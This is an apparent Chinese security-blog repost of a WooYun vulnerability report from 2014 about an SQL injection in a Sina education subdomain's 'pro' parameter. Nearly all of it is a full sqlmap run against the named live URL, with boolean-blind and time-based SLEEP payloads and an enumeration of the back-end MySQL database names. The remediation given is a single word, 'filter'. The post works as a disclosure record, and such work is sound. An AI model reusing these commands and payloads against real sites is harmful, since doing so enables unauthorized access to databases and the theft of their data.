记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

新浪另一分站某SQL注射

2014-10-20 08:40

http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1





pro 参数

漏洞证明:

code 区域
root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1" --dbms=mysql --dbs --threads 5



sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool

http://sqlmap.org



[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program



[*] starting at 22:48:00



[22:48:00] [INFO] testing connection to the target url

[22:48:01] [INFO] heuristics detected web page charset 'ascii'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: pro

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pro=1 AND 7021=7021



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: pro=1 AND SLEEP(5)

---



[22:48:01] [INFO] testing MySQL

[22:48:01] [WARNING] reflective value(s) found and filtering out

[22:48:01] [INFO] confirming MySQL

[22:48:01] [INFO] the back-end DBMS is MySQL



web application technology: Apache

back-end DBMS: MySQL >= 5.0.0

[22:48:01] [INFO] fetching database names

[22:48:01] [INFO] fetching number of databases

[22:48:01] [INFO] retrieved: 3

[22:48:03] [INFO] retrieving the length of query output

[22:48:03] [INFO] retrieved: 18

[22:48:12] [INFO] retrieved: information_schema

[22:48:12] [INFO] retrieving the length of query output

[22:48:12] [INFO] retrieved: 11

[22:48:18] [INFO] retrieved: consultants

[22:48:18] [INFO] retrieving the length of query output

[22:48:18] [INFO] retrieved: 4

[22:48:20] [INFO] retrieved: test

available databases [3]:

[*] consultants

[*] information_schema

[*] test



[22:48:20] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/ischool.edu.sina.com.cn'



[*] shutting down at 22:48:20

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-075092

阅读:71589 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪另一分站某SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云